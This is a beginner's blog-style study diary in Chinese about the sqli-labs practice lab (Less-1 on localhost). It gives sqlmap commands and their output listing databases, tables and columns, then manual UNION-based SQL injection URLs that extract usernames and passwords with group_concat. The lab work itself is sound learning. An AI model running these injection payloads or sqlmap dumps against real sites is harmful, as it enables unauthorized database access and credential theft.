sqli-labs从零开始学习日记(二)
嗯,这次有个很好用的东西SQLMAP,主要是我看的视频里面他们用的是其他的软件,拿东西我不会,我就用SQLMAP来代替了,所以就用它来列数据了
预备知识了
group_concat()这个函数。
对于自己搭建平台进行学习,我们可以手工进行测试,但是我是菜鸟怎么构造语句了,这时候就用SQLMAP自动化测试啦啦啦,里面有个信息等级制度-V3 可以显示一些注入参数 默认为-V1就是基本上就一些重要信息
下面是SQLMAP的一些用法和数据收集,当然也可以用其他,只是其他我不了解。
python sqlmap.py -u http://localhost/sqli-
labs/Less-1/?id=1 -v3(3会显示注入的payload,也可以换其
他的)
sqlmap -u http://localhost/sqli-labs/Less-1/?id=1
--dbs
然后就弄了一堆数据库的信息
available databases [9]:
[*] cdcol
[*] data
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] test
[*] webauth
我只知道这是数据库,其他的不是很明白,还是要补数据库知
识啊。
然后了就是找出库里面的表
python sqlmap.py -u http://localhost/sqli-
labs/Less-1/?id=1 -v3 -D security --tabl
es
数据如下
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
python sqlmap.py -u http://localhost/sqli-
labs/Less-1/?id=1 -D security -T users --columns
数据如下表
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
python sqlmap.py -u http://localhost/sqli-
labs/Less-1/?id=1 -D security -T emails --columns
数据如下表
Database: security
Table: emails
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email_id | varchar(30) |
| id | int(3) |
+----------+-------------+
python sqlmap.py -u http://localhost/sqli-
labs/Less-1/?id=1 -D information_schema --table
数据如下
Database: information_schema
[59 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
python sqlmap.py -u http://localhost/sqli-
labs/Less-1/?id=1 -D information_schema
-T TABLES --columns
数据如下
Database: information_schema
Table: TABLES
[21 columns]
+-----------------+---------------------+
| Column | Type |
+-----------------+---------------------+
| VERSION | bigint(21) unsigned |
| AUTO_INCREMENT | bigint(21) unsigned |
| AVG_ROW_LENGTH | bigint(21) unsigned |
| CHECK_TIME | datetime |
| CHECKSUM | bigint(21) unsigned |
| CREATE_OPTIONS | varchar(255) |
| CREATE_TIME | datetime |
| DATA_FREE | bigint(21) unsigned |
| DATA_LENGTH | bigint(21) unsigned |
| ENGINE | varchar(64) |
| INDEX_LENGTH | bigint(21) unsigned |
| MAX_DATA_LENGTH | bigint(21) unsigned |
| ROW_FORMAT | varchar(10) |
| TABLE_CATALOG | varchar(512) |
| TABLE_COLLATION | varchar(32) |
| TABLE_COMMENT | varchar(2048) |
| TABLE_NAME | varchar(64) |
| TABLE_ROWS | bigint(21) unsigned |
| TABLE_SCHEMA | varchar(64) |
| TABLE_TYPE | varchar(64) |
| UPDATE_TIME | datetime |
+-----------------+---------------------+
还有一个注入语句补充下:
python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=1 -D information_schema -T tables -C table_name --dump //这个是列表里面的内容的,这个貌似还可以限制的,以后我会继续学习补充的
然后这个数据库的内容我们就比较清楚的知道了,作为菜鸟就
可以看着这个构造语句了。
http://localhost/sqli-labs/Less-1/?id=111'union
select 1,table_name,3 from information_schema.tables
where table_schema=database() limit 1(1,2,3,4都试试
),1--+//观察
然后我在下面继续给出由上面一堆数据库弄出来的一些构造语
句。
http://localhost/sqli-labs/Less-1/?id=111'union
select 1,group_concat(table_name),3 from
information_schema.tables where
table_schema=database() --+//然后就可以一起显示了
http://localhost/sqli-labs/Less-1/?id=111'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+//这个是显示USERS里面的数据
http://localhost/sqli-labs/Less-1/?id=-1'union select 1,group_concat(username),3 from users --+//就是ID=多少的用户名数据放一起了
http://localhost/sqli-labs/Less-1/?id=-1'union select 1,group_concat(username),group_concat(password) from users --+//这个就是进化版了,有密码
然后对比分析呗。。。